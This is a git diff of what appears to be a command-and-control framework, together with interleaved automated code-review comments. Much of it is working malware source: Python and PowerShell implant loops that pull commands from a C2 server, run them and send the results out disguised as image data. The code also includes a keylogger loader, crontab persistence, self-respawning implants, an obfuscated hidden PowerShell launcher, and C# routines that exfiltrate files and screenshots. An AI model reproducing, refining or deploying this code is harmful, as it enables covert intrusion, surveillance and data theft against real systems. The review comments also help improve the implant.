yield stdout + sys.stdout = old + + with stdoutIO() as s: + exec module + + returnval = s.getvalue() + + except Exception as e: + returnval = "Error with source file: %%s" %% e + + else: + try: + returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) + except subprocess.CalledProcessError as exc: + returnval = "ErrorCmd: %%s" %% exc.output + + 
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) + opener = urllib2.build_opener() + postcookie = encrypt(key, taskId) + data = base64.b64decode(random.choice(icoimage)) + dataimage = data.ljust( 1500, '\x00' ) + dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True)) + if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) + else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) + res=urllib2.urlopen(req); + response = res.read() + + except Exception as e: + E = e + # print "error %%s" %% e \ No newline at end of file diff --git a/Files/Sharp.cs b/Files/Sharp.cs index 3718a8d..f871eb6 100644 --- a/Files/Sharp.cs +++ b/Files/Sharp.cs 
@@ -376,51 +376,53 @@ public class Program
 var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
 foreach (string c in split) {
- tasksrc = c;
- if (c.ToLower().StartsWith("exit"))
+ var taskId = c.Substring(0, 5);
+ cmd = c.Substring(5, c.Length - 5);
+ tasksrc = cmd;
+ if (cmd.ToLower().StartsWith("exit"))
 {
 exitvt.Set();
 break;
 }
- else if (c.ToLower().StartsWith("loadmodule"))
+ else if (cmd.ToLower().StartsWith("loadmodule"))
 {
- var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
+ var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase);
 var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
 output.AppendLine("Module loaded sucessfully");
- tasksrc = "Module loaded sucessfully";
 }
- else if (c.ToLower().StartsWith("upload-file"))
+ else if (cmd.ToLower().StartsWith("upload-file"))
 {
- var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
+ var path = Regex.Replace(cmd, "upload-file", "", RegexOptions.IgnoreCase);
 var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
 Console.WriteLine("Uploaded file to: " + splitargs[1]);
 var fileBytes = Convert.FromBase64String(splitargs[0]);
 System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
 tasksrc = "Uploaded file sucessfully";
 }
- else if (c.ToLower().StartsWith("download-file"))
+ else if (cmd.ToLower().StartsWith("download-file"))
 {
- var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
+ var path = Regex.Replace(cmd, "download-file ", "", RegexOptions.IgnoreCase);
 var file = File.ReadAllBytes(path.Replace("\"", ""));
 var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
- var dtask = Encryption(Key, c);
+ var eTaskId = Encryption(Key, taskId);
 var dcoutput = Encryption(Key, "", true, fileChuck);
 var doutputBytes = System.Convert.FromBase64String(dcoutput);
 var dsendBytes = ImgGen.GetImgData(doutputBytes);
- GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes);
+ GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes);
+ continue;
 }
- else if (c.ToLower().StartsWith("get-screenshotmulti"))
+ else if (cmd.ToLower().StartsWith("get-screenshotmulti"))
 {
 bool sShot = true;
 int sShotCount = 1;
 while(sShot) {
 var sHot = RunAssembly("run-exe Core.Program Core get-screenshot");
- var dtask = Encryption(Key, c);
+ var eTaskId = Encryption(Key, taskId);
 var dcoutput = Encryption(Key, strOutput.ToString(), true);
 var doutputBytes = System.Convert.FromBase64String(dcoutput);
 var dsendBytes = ImgGen.GetImgData(doutputBytes);
- GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes);
+ GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes);
 Thread.Sleep(240000);
 sShotCount++;
 if (sShotCount > 100) {
@@ -431,21 +433,22 @@ public class Program
 output.Append("[+] Multi Screenshot Ran Sucessfully");
 }
 }
+ continue;
 }
- else if (c.ToLower().StartsWith("listmodules"))
+ else if (cmd.ToLower().StartsWith("listmodules"))
 {
 var appd = AppDomain.CurrentDomain.GetAssemblies();
 output.AppendLine("[+] Modules loaded:").AppendLine("");
 foreach (var ass in appd)
 output.AppendLine(ass.FullName.ToString());
 }
- else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe"))
+ else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe"))
 {
- output.AppendLine(RunAssembly(c));
+ output.AppendLine(RunAssembly(cmd));
 }
- else if (c.ToLower().StartsWith("start-process"))
+ else if (cmd.ToLower().StartsWith("start-process"))
 {
- var proc = c.Replace("'", "").Replace("\"", "");
+ var proc = cmd.Replace("'", "").Replace("\"", "");
 var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
 pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
 var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
@@ -458,7 +461,7 @@ public class Program
 output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd());
 p.WaitForExit();
 }
- else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon"))
+ else if (cmd.ToLower().StartsWith("setbeacon") || cmd.ToLower().StartsWith("beacon"))
 {
 var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?[0-9]{1,9})(?[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
 var mch = bcnRgx.Match(c);
@@ -482,19 +485,19 @@ public class Program
 output.AppendLine(strOutput.ToString());
 var sb = strOutput.GetStringBuilder();
 sb.Remove(0, sb.Length);
- if (tasksrc.Length > 200)
+ if (tasksrc.Length > 200) // This is not used?
 tasksrc = tasksrc.Substring(0, 199);
- var task = Encryption(Key, tasksrc);
+ var enTaskId = Encryption(Key, taskId);
 var coutput = Encryption(Key, output.ToString(), true);
 var outputBytes = System.Convert.FromBase64String(coutput);
 var sendBytes = ImgGen.GetImgData(outputBytes);
- GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
+ GetWebRequest(enTaskId).UploadData(UrlGen.GenerateUrl(), sendBytes);
 }
 }
 }
 catch (Exception e)
 {
- var task = Encryption(Key, "Error");
+ var task = Encryption(Key, "Error");
 var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
 var outputBytes = System.Convert.FromBase64String(eroutput);
 var sendBytes = ImgGen.GetImgData(outputBytes);
diff --git a/HTML.py b/HTML.py
index 66fb532..7dada64 100644
--- a/HTML.py
+++ b/HTML.py
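Review bot: `var mch = bcnRgx.Match(c);` still matches against `c`, while every sibling branch in this hunk and the ones above now dispatch on `cmd`; after this change `c` carries the five-character task id prefix, so the lookbehind still finds the beacon value but this is the one place the pre-refactor variable leaks through. `var mch = bcnRgx.Match(cmd);` keeps the branch consistent with the rest of the chain. The `else if` chain starts and ends outside this hunk.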
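Review bot: `if (tasksrc.Length > 200) // This is not used?` leaves a question in the code where a decision belongs: with the cookie now built from `enTaskId`, the `tasksrc` assignments earlier in the loop and this truncation no longer feed anything visible in the diff, so either remove them or replace the comment with a sentence saying why they stay. The catch block below still sends the literal `Error` cookie rather than a task id, so a failed chunk presumably cannot be matched to its task record on the server side; `taskId` is scoped to the foreach, so surfacing it in the catch would need a variable declared at try level. The try block enclosing this hunk begins before it.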
@@ -209,8 +209,8 @@ function SearchTask() { function tweakMarkup(){ // Add classes to columns - var classes = ['id', 'taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] - //var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + var classes = ['id', 'taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + //var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] tbl = document.getElementById("PoshTable"); ths = tbl.getElementsByTagName("th"); for( i=0; i'; td.onclick = toggleHide @@ -333,7 +333,7 @@ table { table tr th.randomuri { width: 15%; } - table tr th.prompt { + table tr th.user { width: 10%; } @@ -355,7 +355,7 @@ __________ .__. _________ ________ """ - if table == "CompletedTasks": + if table == "Tasks": HTMLPre += """ @@ -372,13 +372,13 @@ __________ .__. _________ ________ frame = pd.read_sql_query("SELECT * FROM %s" % table, conn) # encode the Output column - if table == "CompletedTasks": + if table == "Tasks": for index, row in frame.iterrows(): frame.loc[index, "Command"] = replace_tabs(cgi.escape(row["Command"])) frame.loc[index, "Output"] = replace_tabs(cgi.escape(row["Output"])) # convert the random uri to original hostname - if table == "CompletedTasks": + if table == "Tasks": framelen = frame['RandomURI'].count() for x in range(0, framelen): try: 
@@ -404,7 +404,7 @@ __________ .__. _________ ________ HTMLPost = HTMLPost.replace("RandomURI","RandomURI") HTMLPost = HTMLPost.replace("Command","Command") HTMLPost = HTMLPost.replace("Output","Output") - HTMLPost = HTMLPost.replace("Prompt","Prompt") + HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("ImplantID","ImplantID") HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("Hostname","Hostname") diff --git a/Implant.py b/Implant.py index 29d58db..461dde5 100644 --- a/Implant.py +++ b/Implant.py 
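Review bot: After the rename this hunk contains two `HTMLPost = HTMLPost.replace("User","User")` lines two rows apart, the new one and the pre-existing one for the implant table's column; the markup that distinguished the `Prompt` and `User` header cells appears to have been lost in this rendering, but if both calls target the same `User` header the second is either a no-op or re-wraps the output of the first, depending on what the replacement strings actually are. Worth confirming the two replacement strings differ, or merging the two lines into one. The function enclosing this hunk begins before it.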
@@ -41,516 +41,10 @@ NEWKEY8839394%s4939388YEKWEN IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages) with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f: self.PythonImplant = base64.b64encode(f.read()) - self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random -hh = '%s' -timer = %s -icoimage = [%s] -urls = [%s] -kd=time.strptime("%s","%%d/%%m/%%Y") -useragent = "" -imbase = "%s" - -def keylog(): - # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py - import os,time,base64,subprocess,uuid - filename = "/tmp/%%s" %% uuid.uuid4().hex - b64logger = "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" - modb64logger = base64.b64decode(b64logger) - modpayload = modb64logger.replace("REPLACEME",filename) - exec(modpayload) - pids = os.popen('ps aux | grep " ruby" | grep -v grep').read() - returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename) - return returnval - -def dfile(fname): - if fname: - with open(fname, "rb") as image_file: - imgbytes = image_file.read() - return "0000100001" + imgbytes - -def ufile(base64file, fname): - fname = fname.replace('"','') - filebytes = base64.b64decode(base64file) - try: - output_file = open(fname, 'w') - output_file.write(filebytes) - output_file.close() - return "Uploaded file %%s" %% fname - except Exception as e: - return "Error with source file: %%s" %% e - -def sai(delfile=False): - import uuid - filename = "/tmp/%%s.sh" %% (uuid.uuid4().hex) - imfull = base64.b64decode(imbase) - output_file = open(filename, 'w') - output_file.write(imfull) - output_file.close() - import subprocess - returnval = "Ran Start Another Implant - File dropped: %%s" %% filename - p = subprocess.Popen(["sh", filename]) - if delfile: - p = subprocess.Popen(["rm", filename]) - returnval = "Ran 
Start Another Implant - File removed: %%s" %% filename - return returnval - -def persist(): - import uuid, os - dircontent = "%%s/.%%s" %% (os.environ['HOME'], uuid.uuid4().hex) - os.mkdir(dircontent) - filename = "%%s/%%s_psh.sh" %% (dircontent, uuid.uuid4().hex) - imfull = base64.b64decode(imbase) - output_file = open(filename, 'w') - output_file.write(imfull) - output_file.close() - import subprocess as s - s.call("crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -" %% filename, shell=True) - return "Installing persistence via user crontab everyday at 10am: \\r\\n%%s" %% filename - -def remove_persist(): - import subprocess as s - s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True) - return "Removed user persistence via crontab: \\r\\n**must delete files manually**" - -def decrypt_bytes_gzip( key, data): - iv = data[0:16] - aes = get_encryption(key, iv) - data = aes.decrypt( data ) - import StringIO - import gzip - infile = StringIO.StringIO(data[16:]) - with gzip.GzipFile(fileobj=infile, mode="r") as f: - data = f.read() - return data - -while(True): - cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y") - if cstr < kd: - key = "%s" - uri = "%s" - server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) - try: - time.sleep(timer) - ua='%s' - if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) - else: req=urllib2.Request(server,headers={'User-agent':ua}) - res=urllib2.urlopen(req); - html = res.read() - except Exception as e: - E = e - #print "error %%s" %% e - #print html - if html: - try: - returncmd = decrypt( key, html ) - returncmd = returncmd.rstrip('\\0') - - if "multicmd" in returncmd: - - returncmd = returncmd.replace("multicmd","") - returnval = "" - split = returncmd.split("!d-3dion@LD!-d") - - for cmd in split: - if cmd[:10] == "$sleeptime": - timer = int(cmd.replace("$sleeptime = ","")) - elif cmd[:13] == "download-file": - fname = cmd.replace("download-file 
","") - returnval = dfile(fname) - elif cmd[:11] == "upload-file": - fullparams = cmd.replace("upload-file ","") - params = fullparams.split(":") - returnval = ufile(params[1],params[0]) - elif cmd[:19] == "install-persistence": - returnval = persist() - elif cmd[:14] == "get-keystrokes": - returnval = keylog() - elif cmd[:18] == "remove-persistence": - returnval = remove_persist() - elif cmd[:19] == "startanotherimplant": - returnval = sai(delfile=True) - elif cmd[:28] == "startanotherimplant-keepfile": - returnval = sai() - elif cmd[:10] == "loadmodule": - module = cmd.replace("loadmodule","") - exec(module) - try: - import sys - import StringIO - import contextlib - - @contextlib.contextmanager - def stdoutIO(stdout=None): - old = sys.stdout - if stdout is None: - stdout = StringIO.StringIO() - sys.stdout = stdout - yield stdout - sys.stdout = old - - with stdoutIO() as s: - exec module - if s.getvalue(): - returnval = s.getvalue() - else: - returnval = "Module loaded" - except Exception as e: - returnval = "Error with source file: %%s" %% e - - elif cmd.startswith("linuxprivchecker"): - args = cmd[len('linuxprivchecker'):].strip() - args = args.split() - pycode_index = args.index('-pycode') - encoded_module = args[pycode_index +1] - args.pop(pycode_index) - args.pop(pycode_index) - pycode = base64.b64decode(encoded_module) - process = ['python', '-c', pycode] - pycode = 'import sys; sys.argv = sys.argv[1:];' + pycode - import subprocess - returnval = subprocess.check_output(['python', '-c', pycode] + args) - - elif cmd[:6] == "python": - module = cmd.replace("python ","") - try: - import sys - import StringIO - import contextlib - - @contextlib.contextmanager - def stdoutIO(stdout=None): - old = sys.stdout - if stdout is None: - stdout = StringIO.StringIO() - sys.stdout = stdout - yield stdout - sys.stdout = old - - with stdoutIO() as s: - exec module - - returnval = s.getvalue() - - except Exception as e: - returnval = "Error with source file: %%s" %% e - - 
else: - try: - returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) - except subprocess.CalledProcessError as exc: - returnval = "ErrorCmd: %%s" %% exc.output - - server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) - opener = urllib2.build_opener() - if (len(cmd) > 200): - cmd = cmd[0:200] - postcookie = encrypt(key, cmd) - data = base64.b64decode(random.choice(icoimage)) - dataimage = data.ljust( 1500, '\\0' ) - dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True)) - if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) - else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) - res=urllib2.urlopen(req); - response = res.read() - - except Exception as e: - E = e - #print "error %%s" %% e - w = \"\"""" % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) - self.C2Core = """ -$key="%s" -$global:sleeptime = '%s' - -$payloadclear = @" -[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true} -`$s="$s" -`$sc="$sc" -function DEC {${function:DEC}} -function ENC {${function:ENC}} -function CAM {${function:CAM}} -function Get-Webclient {${function:Get-Webclient}} -function Primer {${function:primer}} -`$primer = primer -if (`$primer) {`$primer| iex} else { -start-sleep 1800 -primer | iex } -"@ - -$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear) -$CompressedStream = New-Object IO.MemoryStream -$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) -$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length) -$DeflateStream.Dispose() -$CompressedScriptBytes = $CompressedStream.ToArray() -$CompressedStream.Dispose() -$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes) 
-$NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" -$UnicodeEncoder = New-Object System.Text.UnicodeEncoding -$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript)) -$payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)" -$payload = $payloadraw -replace "`n", "" - -function GetImgData($cmdoutput) { - $icoimage = @(%s) - - try {$image = $icoimage|get-random}catch{} - - function randomgen - { - param ( - [int]$Length - ) - $set = "...................@..........................Tyscf".ToCharArray() - $result = "" - for ($x = 0; $x -lt $Length; $x++) - {$result += $set | Get-Random} - return $result - } - $imageBytes = [Convert]::FromBase64String($image) - $maxbyteslen = 1500 - $maxdatalen = 1500 + ($cmdoutput.Length) - $imagebyteslen = $imageBytes.Length - $paddingbyteslen = $maxbyteslen - $imagebyteslen - $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen)) - $ImageBytesFull = New-Object byte[] $maxdatalen - [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length) - [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length) - [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length ) - $ImageBytesFull -} -function Create-AesManagedObject($key, $IV) { - try { - $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged" - } catch { - $aesManaged = New-Object "System.Security.Cryptography.AesCryptoServiceProvider" - } - $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC - $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros - $aesManaged.BlockSize = 128 - $aesManaged.KeySize = 256 - if ($IV) { - if 
($IV.getType().Name -eq "String") { - $aesManaged.IV = [System.Convert]::FromBase64String($IV) - } - else { - $aesManaged.IV = $IV - } - } - if ($key) { - if ($key.getType().Name -eq "String") { - $aesManaged.Key = [System.Convert]::FromBase64String($key) - } - else { - $aesManaged.Key = $key - } - } - $aesManaged -} - -function Encrypt-String($key, $unencryptedString) { - $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString) - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length); - [byte[]] $fullData = $aesManaged.IV + $encryptedData - #$aesManaged.Dispose() - [System.Convert]::ToBase64String($fullData) -} -function Encrypt-Bytes($key, $bytes) { - [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream - $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress) - $gzipStream.Write( $bytes, 0, $bytes.Length ) - $gzipStream.Close() - $bytes = $output.ToArray() - $output.Close() - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) - [byte[]] $fullData = $aesManaged.IV + $encryptedData - $fullData -} -function Decrypt-String($key, $encryptedStringWithIV) { - $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV) - $IV = $bytes[0..15] - $aesManaged = Create-AesManagedObject $key $IV - $decryptor = $aesManaged.CreateDecryptor(); - $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16); - #$aesManaged.Dispose() - [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0) -} -function Encrypt-String2($key, $unencryptedString) { - $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString) - $CompressedStream = New-Object IO.MemoryStream - $DeflateStream = New-Object System.IO.Compression.GzipStream 
$CompressedStream, ([IO.Compression.CompressionMode]::Compress) - $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length) - $DeflateStream.Dispose() - $bytes = $CompressedStream.ToArray() - $CompressedStream.Dispose() - $aesManaged = Create-AesManagedObject $key - $encryptor = $aesManaged.CreateEncryptor() - $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length) - [byte[]] $fullData = $aesManaged.IV + $encryptedData - $fullData -} -function Decrypt-String2($key, $encryptedStringWithIV) { - $bytes = $encryptedStringWithIV - $IV = $bytes[0..15] - $aesManaged = Create-AesManagedObject $key $IV - $decryptor = $aesManaged.CreateDecryptor() - $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16) - $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() - $output - #[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0) -} -[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} - -$URI= "%s" -$Server = "$s/%s" -$ServerClean = "$sc" -while($true) -{ - $ServerURLS = "$($ServerClean)","$($ServerClean)" - $date = (Get-Date -Format "dd/MM/yyyy") - $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null) - $killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null) - if ($killdate -lt $date) {exit} - $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9) - $newsleep = $sleeptimeran|get-random - if ($newsleep -lt 1) {$newsleep = 5} - start-sleep $newsleep - $URLS = %s - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {} - - while($ReadCommand) { - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = 
"$ServerClean/$RandomURI$G/?$URI" - try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {} - $error.clear() - if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) { - if ($ReadCommandClear.ToLower().StartsWith("multicmd")) { - $splitcmd = $ReadCommandClear -replace "multicmd","" - $split = $splitcmd -split "!d-3dion@LD!-d" - foreach ($i in $split){ - $RandomURI = Get-Random $URLS - $ServerClean = Get-Random $ServerURLS - $G=[guid]::NewGuid() - $Server = "$ServerClean/$RandomURI$G/?$URI" - $error.clear() - if ($i.ToLower().StartsWith("upload-file")) { - try { - $Output = Invoke-Expression $i | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } - $ModuleLoaded = Encrypt-String $key $result - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorUpload: " + $error[0] - } - } elseif ($i.ToLower().StartsWith("download-file")) { - try { - Invoke-Expression $i | Out-Null - } - catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } elseif ($i.ToLower().StartsWith("loadmodule")) { - try { - $modulename = $i -replace "LoadModule","" - $Output = Invoke-Expression $modulename | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $ModuleLoaded = Encrypt-String $key "ModuleLoaded" - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } else { - try { - $Output = Invoke-Expression $i | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $StdError = ($error[0] | Out-String) - if ($StdError){ - $Output = $Output + $StdError - $error.clear() - } - } catch { - $Output = "ErrorCmd: " + $error[0] - } 
- try { - $Output = Encrypt-String2 $key $Output - $Response = Encrypt-String $key $i - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $Response).UploadData("$Server", $UploadBytes)|out-null - } catch{} - } - } - } - elseif ($ReadCommandClear.ToLower().StartsWith("upload-file")) { - try { - $Output = Invoke-Expression $ReadCommandClear | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] } - $ModuleLoaded = Encrypt-String $key $result - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorUpload: " + $error[0] - } - - } elseif ($ReadCommandClear.ToLower().StartsWith("download-file")) { - try { - Invoke-Expression $ReadCommandClear | Out-Null - } - catch { - $Output = "ErrorLoadMod: " + $error[0] - } - } elseif ($ReadCommandClear.ToLower().StartsWith("loadmodule")) { - try { - $modulename = $ReadCommandClear -replace "LoadModule","" - $Output = Invoke-Expression $modulename | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $ModuleLoaded = Encrypt-String $key "ModuleLoaded" - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null - } catch { - $Output = "ErrorLoadMod: " + $error[0] - } - - } else { - try { - $Output = Invoke-Expression $ReadCommandClear | out-string - $Output = $Output + "123456PS " + (Get-Location).Path + ">654321" - $StdError = ($error[0] | Out-String) - if ($StdError){ - $Output = $Output + $StdError - $error.clear() - } - } catch { - $Output = "ErrorCmd: " + $error[0] - } - try { - $Output = Encrypt-String2 $key $Output - $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null - } catch {} - } - 
$ReadCommandClear = $null - $ReadCommand = $null - } - break - } -}""" % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) + py_implant_core = open("%s/PyImplant-Core.py" % FilesDirectory, 'r').read() + self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent) + ps_implant_core = open("%s/PSImplant-Core.ps1" % FilesDirectory, 'r').read() + self.C2Core = ps_implant_core % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) #Add all db elements def display(self): @@ -607,8 +101,8 @@ while($true) new_implant(self.RandomURI, self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.Proxy, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label) def autoruns(self): - new_task("loadmodule Implant-Core.ps1", self.RandomURI) - update_mods("Implant-Core.ps1", self.RandomURI) + new_task("loadmodule Core.ps1", self.RandomURI) + update_mods("Core.ps1", self.RandomURI) result = get_autoruns() if result: autoruns = "" diff --git a/ImplantHandler.py b/ImplantHandler.py index 7ffcc01..7007602 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py @@ -250,7 +250,7 @@ def startup(printhelp = ""): startup() if "output-to-html" in implant_id.lower(): - generate_table("CompletedTasks") + generate_table("Tasks") generate_table("C2Server") generate_table("Creds") generate_table("Implants") @@ -307,7 +307,7 @@ def startup(printhelp = ""): startup("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd) if "opsec" in implant_id.lower(): implants = get_implants_all() - comtasks = get_completedtasks() + comtasks = get_tasks() hosts = "" uploads = "" urls = "" 
